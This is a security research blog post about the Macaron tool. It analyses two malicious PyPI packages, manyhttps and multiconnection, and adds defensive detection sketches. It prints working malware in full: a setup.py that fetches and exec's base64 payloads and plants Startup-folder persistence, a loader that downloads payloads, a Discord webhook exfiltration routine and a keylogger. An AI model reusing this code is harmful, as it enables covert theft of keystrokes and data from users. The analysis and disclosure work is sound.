Detecting Malicious Behavior in Software Supply Chains, Part 1

Macaron is a supply-chain security analysis framework from Oracle Labs. We recently open sourced the project to enable collaboration and to contribute to the open source security community. Over the past year, we’ve partnered with academics to develop new methods that automatically identify harmful Python packages on PyPI, the main repository for Python packages. We share insights from this research in a series of articles, each detailing a chosen subset of the malicious packages we found. All the methods we used to detect these threats will also be shared with the community in our tool, Macaron. Explore this tutorial to get started, and watch for additional analysis as we further develop Macaron.

In our research, we’ve developed new analyses and identified and reported more than 180 malicious packages in the PyPI repository, all of which were confirmed by the PyPI security team and removed from the repository. In this first blog post, we provide a detailed description of two malicious packages published on PyPI, manyhttps and multiconnection. These packages were designed to log keystrokes, take screenshots of the user’s environment, steal cryptocurrencies, send sensitive information to a remote server, and run malicious scripts every time a user logs in to the system.

Background

Detecting malicious behavior in open-source software has been a focus for the Open Source Security Foundation (OpenSSF) community in recent years. One significant initiative is Supply-chain Levels for Software Artifacts (SLSA), which offers practical recommendations to enhance the integrity of software packages and infrastructure. Macaron is designed to detect poorly maintained or malicious packages by implementing checks inspired by the SLSA specification. However, some forms of attack currently fall outside the scope of SLSA version 1. Notably, SLSA doesn’t address the issue of malicious maintainers. Our primary goal is to make it more difficult for malicious actors to compromise critical supply chains and infrastructure. To achieve this, we’re developing new methods to detect when maintainers of open source projects are untrustworthy and deliberately spread malware. Macaron prioritizes malware detection above vulnerability management in the supply chain to mitigate immediate risks and protect against unknown threats in diverse and complex environments.

The manyhttps Package

On May 1st, 2024, our analysis reported that the package manyhttps could perform malicious activities via setup.py. Moreover, a malicious actor had shown suspicious behavior on PyPI: the actor published one package with multiple versions within a few hours of registering an account.

After a few hours, the malicious actor deleted all but one version of the package. By querying the PyPI repository API, we collected these details and used them in our analysis to discover malicious activities on PyPI.
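The release-timing signal described above can be sketched as follows. This is a minimal illustration, not Macaron's actual check. It assumes the input has the shape of the "releases" field returned by PyPI's JSON API (a mapping from version to a list of files, each with an upload_time_iso_8601 timestamp). The function names and the thresholds (three versions within six hours) are hypothetical. Because deleted versions no longer appear in the API response, a check like this has to run before the actor cleans up.

```python
from datetime import datetime, timedelta


def first_upload_times(releases):
    """Map each version to its earliest upload time.

    `releases` is assumed to look like the "releases" field of PyPI's JSON API:
    {version: [{"upload_time_iso_8601": "..."}, ...]}.
    """
    times = {}
    for version, files in releases.items():
        stamps = [
            datetime.fromisoformat(f["upload_time_iso_8601"].replace("Z", "+00:00"))
            for f in files
        ]
        if stamps:  # versions without any files are skipped
            times[version] = min(stamps)
    return times


def has_release_burst(releases, min_versions=3, window=timedelta(hours=6)):
    """Return True if at least `min_versions` versions were uploaded within `window`.

    The default thresholds are illustrative assumptions, not tuned values.
    """
    stamps = sorted(first_upload_times(releases).values())
    for i in range(len(stamps) - min_versions + 1):
        if stamps[i + min_versions - 1] - stamps[i] <= window:
            return True
    return False
```

A burst alone is weak evidence, since legitimate projects also publish quick fix-up releases. It is more useful when combined with other signals, such as a newly registered account.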

Now, let’s look at the malicious source code in the setup.py module.

# setup.py code snippet

import urllib.request
import zipfile
import os
import base64
import sys
import shutil
import time

if getattr(sys, ‘frozen’, False):
    currentFilePath = os.path.dirname(sys.executable)
else:
    currentFilePath = os.path.dirname(os.path.abspath(__file__))

fileName = os.path.basename(sys.argv[0])
filePath = os.path.join(currentFilePath, fileName)

startupFolderPath = os.path.join(os.path.expanduser(‘~’), ‘AppData’, ‘Roaming’, ‘Microsoft’, ‘Windows’, ‘Start Menu’, ‘Programs’, ‘Startup’)
startupFilePath = os.path.join(startupFolderPath, fileName)

loader_url = “https://frvezdffvv.pythonanywhere.com/getloader”
loader_name = urllib.request.urlopen(loader_url).read()

pyt_url = “https://frvezdffvv.pythonanywhere.com/getpyt”
pyt_name = urllib.request.urlopen(pyt_url).read()

with open(startupFolderPath+“\\pip.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({loader_name}))”)

with open(“pip.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({loader_name}))”)

with open(startupFolderPath+“\\pyt.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({pyt_name}))”)

with open(“pyt.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({pyt_name}))”)
import subprocess

subprocess.Popen([“python”, “pip.py”], creationflags=subprocess.CREATE_NO_WINDOW)
subprocess.Popen([“python”, “pyt.py”], creationflags=subprocess.CREATE_NO_WINDOW)
time.sleep(20)

Here are the key observations:

The malicious code resembles the code in cstealer, a tool designed for educational purposes to illustrate how secrets can be stolen.
The malicious code is split and stored on different endpoints of a remote server (possibly for obfuscation purposes).
The attack target is Windows users (possibly due to a large user base).
The malicious packages and code are stored on https://frvezdffvv.pythonanywhere.com/

Analysis of Each Section of setup.py

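At the beginning of the source code, the script determines the directory it is running from (the directory of the executable if the program is frozen, otherwise the directory of setup.py) and builds the full path to the running file.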

if getattr(sys, ‘frozen’, False):
    currentFilePath = os.path.dirname(sys.executable)
else:
    currentFilePath = os.path.dirname(os.path.abspath(__file__))

fileName = os.path.basename(sys.argv[0])
filePath = os.path.join(currentFilePath, fileName)

Next, the code sets a file path under the Windows Startup directory.

startupFolderPath = os.path.join(os.path.expanduser(‘~’), ‘AppData’, ‘Roaming’, ‘Microsoft’, ‘Windows’, ‘Start Menu’, ‘Programs’, ‘Startup’)
startupFilePath = os.path.join(startupFolderPath, fileName)

Two base64-encoded code snippets are obtained from a remote server.

loader_url = “https://frvezdffvv.pythonanywhere.com/getloader”
loader_name = urllib.request.urlopen(loader_url).read()

pyt_url = “https://frvezdffvv.pythonanywhere.com/getpyt”
pyt_name = urllib.request.urlopen(pyt_url).read()

Each of the two base64-encoded snippets is embedded in a small wrapper script, and the wrappers are written as pip.py and pyt.py to both the current directory and the Startup directory. Note that the file names pip.py and pyt.py are chosen to hide the malicious code under “standard” file names, making it difficult to detect. We suspect that the same Python files are stored in two directories to ensure the code runs immediately and again whenever the user logs in. When these Python files run, the embedded payload is decoded and then executed.

with open(startupFolderPath+“\\pip.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({loader_name}))”)

with open(“pip.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({loader_name}))”)

with open(startupFolderPath+“\\pyt.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({pyt_name}))”)

with open(“pyt.py”, “w+”) as file:
    file.write(f”import base64\nexec(base64.b64decode({pyt_name}))”)
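The wrapper scripts written above share a recognizable shape: a call to exec wrapped directly around base64.b64decode. A defender could look for that shape in a directory such as the Windows Startup folder. The following is a minimal sketch under that assumption; the function name and the regular expression are hypothetical, and a simple text match like this is easy to evade, so it should be treated as a triage aid rather than a detector.

```python
import re
from pathlib import Path

# Matches the wrapper shape seen in the sample: exec(base64.b64decode(...)).
WRAPPER_PATTERN = re.compile(r"exec\s*\(\s*base64\.b64decode\s*\(")


def find_exec_wrappers(directory):
    """Return the sorted names of .py files in `directory` that contain the wrapper pattern."""
    hits = []
    for path in Path(directory).glob("*.py"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable files are skipped, not classified
        if WRAPPER_PATTERN.search(text):
            hits.append(path.name)
    return sorted(hits)
```

The files are only read as text and never imported or executed, so running the scan does not trigger the payload.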

Finally, the two Python files pip.py and pyt.py are run using the subprocess module. Additionally, the code sets the CREATE_NO_WINDOW option to suppress the creation of a console window for each subprocess.

import subprocess

subprocess.Popen([“python”, “pip.py”], creationflags=subprocess.CREATE_NO_WINDOW)
subprocess.Popen([“python”, “pyt.py”], creationflags=subprocess.CREATE_NO_WINDOW)
time.sleep(20)
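The behaviors walked through in this section (network fetches, dynamic execution, and spawning subprocesses from setup.py) can be flagged statically without running the file. The sketch below uses Python's ast module to list suspicious imports and calls. The rule sets and function names are assumptions chosen for illustration and do not represent Macaron's actual heuristics.

```python
import ast

# Hypothetical rule sets for illustration only.
SUSPICIOUS_IMPORTS = {"urllib.request", "subprocess", "base64", "socket"}
SUSPICIOUS_CALLS = {"exec", "eval", "urlopen", "urlretrieve", "b64decode", "Popen"}


def call_name(node):
    """Return the rightmost name of a call target, e.g. 'urlopen' for urllib.request.urlopen(...)."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return None


def scan_setup_source(source):
    """Return a sorted list of suspicious imports and calls found in `source`.

    The source is parsed but never executed.
    """
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in SUSPICIOUS_IMPORTS:
                    findings.add(f"import:{alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if node.module in SUSPICIOUS_IMPORTS:
                findings.add(f"import:{node.module}")
        elif isinstance(node, ast.Call):
            name = call_name(node)
            if name in SUSPICIOUS_CALLS:
                findings.add(f"call:{name}")
    return sorted(findings)
```

Each of these constructs also appears in benign packages, so individual findings mean little. The combination of a download, a base64 decode, and a hidden subprocess in a setup.py is what makes a package worth a closer look.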

Analysis of the Malicious Payload Obtained from the Remote Server

getloader: https://frvezdffvv.pythonanywhere.com/getloader

The code obtained from getloader retrieves six packages as ZIP files from the remote server. Upon further examination, we discovered that several of these ZIP files were missing for unknown reasons. We hypothesize that the absent files are dependencies for cryptographic functions and certificates required by other packages.

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getcrypto”, ‘Crypto.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“Crypto.zip”)

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/geturllib3”, ‘urllib3.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“urllib3.zip”)

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getcharset”, ‘charset_normalizer.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“charset_normalizer.zip”)

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getidna”, ‘idna.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“idna.zip”)

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getcertifi”, ‘certifi.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“certifi.zip”)

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getrequests”, ‘requests.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“requests.zip”)

getpackage: https://frvezdffvv.pythonanywhere.com/getpackage

The code obtained from getpackage retrieves the main attack payload from the remote server and then runs the code. The source code appears to be a modified version of the cstealer project available on GitHub.

package_url = “https://frvezdffvv.pythonanywhere.com/getpackage”
package_name = urllib.request.urlopen(package_url).read()
exec(base64.b64decode(package_name))

getpyt: https://frvezdffvv.pythonanywhere.com/getpyt

The code in getpyt sends the path of the current working directory to a webhook.

h00k = “https://discord.com/api/webhooks/1235100226247983124/ElCHWutw_oAGHKLC6lGJt6nT72p9eyw_Zk6Yqy_xaHJ4HQXM3Sxm62us6tNYnJSIqJty”

def L04DUr118(h00k, data=”, headers=”):
    for i in range(8):
        try:
            if headers != ”:
                r = urlopen(Request(h00k, data=data, headers=headers))
            else:
                r = urlopen(Request(h00k, data=data))
            return r
        except:
           pass

def test():
    headers = {
        “Content-Type”: “application/json”,
        “User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0”
    }

    data = {
        “content”: os.getcwd(),
    }

    L04DUr118(h00k, data=json.dumps(data).encode(), headers=headers)
test()

Next, getpyt obtains three packages from the remote server, which are used to identify the active window and log keystrokes.

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getpyrect”, ‘pyrect.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“pyrect.zip”)

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getpygetwindow”, ‘pygetwindow.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“pygetwindow.zip”)

zip_file_path,_ = urllib.request.urlretrieve(“https://frvezdffvv.pythonanywhere.com/getkeyboard”, ‘keyboard.zip’)
with zipfile.ZipFile(zip_file_path, ‘r’) as zip_ref:
            zip_ref.extractall()
os.remove(“keyboard.zip”)

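Finally, the hostname is sent to the Discord webhook, and the keystroke logging logic is implemented as shown below. Keystrokes are accumulated per window title, so each captured message is associated with the window in which it was typed.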

hook = “https://discord.com/api/webhooks/1235100226247983124/ElCHWutw_oAGHKLC6lGJt6nT72p9eyw_Zk6Yqy_xaHJ4HQXM3Sxm62us6tNYnJSIqJty”

msgcomp = {
“content”: str(socket.gethostname()) +” – Lgr online.”
}
r = requests.post(hook, json=msgcomp)

alphabet = [‘a’, ‘b’, ‘c’, ‘d’, ‘e’, ‘f’, ‘g’, ‘h’, ‘i’, ‘j’, ‘k’, ‘l’, ‘m’, ‘n’, ‘o’, ‘p’, ‘q’, ‘r’, ‘s’, ‘t’, ‘u’, ‘v’, ‘w’, ‘x’, ‘y’, ‘z’, ‘A’, ‘B’, ‘C’, ‘D’, ‘E’, ‘F’, ‘G’, ‘H’, ‘I’, ‘J’, ‘K’, ‘L’, ‘M’, ‘N’, ‘O’, ‘P’, ‘Q’, ‘R’, ‘S’, ‘T’, ‘U’, ‘V’, ‘W’, ‘X’, ‘Y’, ‘Z’, ‘!’, ‘@’, ‘#’, ‘$’, ‘%’, ‘^’, ‘&’, ‘*’, ‘(‘, ‘)’, ‘-‘, ‘_’, ‘+’, ‘=’, ‘{‘, ‘}’, ‘[‘, ‘]’, ‘|’, ‘\\’, ‘;’, ‘:’, “‘”, ‘”‘, ‘,’, ‘.’, ‘<‘, ‘>’, ‘/’, ‘?’, ‘0’, ‘1’, ‘2’, ‘3’, ‘4’, ‘5’, ‘6’, ‘7’, ‘8’, ‘9’]

def on_key(event):
    global msg
    global isupper
    global messages
    global alphabet

    try:
        try:
            focused_window = gw.getWindowsWithTitle(gw.getActiveWindowTitle())[0]
        except:
            focused_window = “None”

        if event.event_type == keyboard.KEY_DOWN:
            if “backspace” in event.name:
                try:
                    incompletemsgs[str(focused_window.title)] = incompletemsgs[str(focused_window.title)][:-1]
                except:
                    pass

            elif “enter” in event.name:
                try:
                    messages.append([str(focused_window.title), incompletemsgs[str(focused_window.title)]])
                    incompletemsgs[str(focused_window.title)] = “”
                except:
                    pass

            elif “space” in event.name:
                try:
                    incompletemsgs[str(focused_window.title)] = incompletemsgs[str(focused_window.title)]+ ” “
                except:
                    pass


            elif event.name in alphabet:
                msg = msg +(str(event.name))
                if str(focused_window.title) in incompletemsgs:
                    incompletemsgs[str(focused_window.title)] = incompletemsgs[str(focused_window.title)] + str(event.name)
                else:

                    incompletemsgs[str(focused_window.title)] = str(event.name)
    except:
        pass
keyboard.hook(on_key)

The multiconnection Package

A few days after reporting manyhttps, our analysis discovered a new package, multiconnection, which shared many similarities with manyhttps. For example, the malicious payload is stored in setup.py, and some irrelevant scripts are included to give the impression that the package is benign. Furthermore, the main malicious code is encoded in base64 and obtained from the frvezdffvvvv.pythonanywhere.com domain. Like manyhttps, this package aims to capture screenshots, steal sensitive information from the victim, and send that information to a Discord webhook.
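Because both packages rely on the same kinds of network endpoints, extracting those indicators from source text is one simple way to link related samples. The sketch below is an assumption about how such matching could be done, not a description of Macaron. The function name and patterns are hypothetical, and pythonanywhere.com is a legitimate hosting service, so a match is only a hint.

```python
import re

# Patterns for the two kinds of network indicators discussed in this article.
PYTHONANYWHERE_HOST = re.compile(r"\b([a-z0-9-]+\.pythonanywhere\.com)\b", re.IGNORECASE)
DISCORD_WEBHOOK = re.compile(r"https://discord(?:app)?\.com/api/webhooks/\d+/[\w-]+")


def extract_indicators(source):
    """Return hosting domains and Discord webhook IDs referenced in `source`."""
    hosts = sorted({m.lower() for m in PYTHONANYWHERE_HOST.findall(source)})
    # Keep only the numeric webhook ID so the secret token is not copied into reports.
    webhook_ids = sorted({url.split("/")[5] for url in DISCORD_WEBHOOK.findall(source)})
    return {"hosts": hosts, "webhook_ids": webhook_ids}
```

Two packages that yield the same webhook ID, or closely related host names, are good candidates for having the same author.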

Impact and Responsible Disclosure

The malicious packages, manyhttps and multiconnection, found by Macaron were designed to log keystrokes, take screenshots from the user’s environment, steal cryptocurrencies, send sensitive information to a remote server, and run malicious scripts every time the user logs in to the system. We have reported the malicious packages to the PyPI security team, and all the versions of these packages were immediately removed from PyPI.

Thank you for reading our first article in the malware detection series. Stay tuned for the next article on a different set of malicious packages, and meanwhile check out our open source project, Macaron. Start with this tutorial, and keep an eye out for further analysis as we continue to enhance Macaron. We look forward to your feedback and contributions.

Authors

Behnaz Hassanshahi, Principal Researcher at Oracle Labs

Yao Wen Chang, Graduate of the University of Melbourne

Trong Nhan Mai, Software Engineer at Oracle Labs

Christoph Treude, Associate Professor at Singapore Management University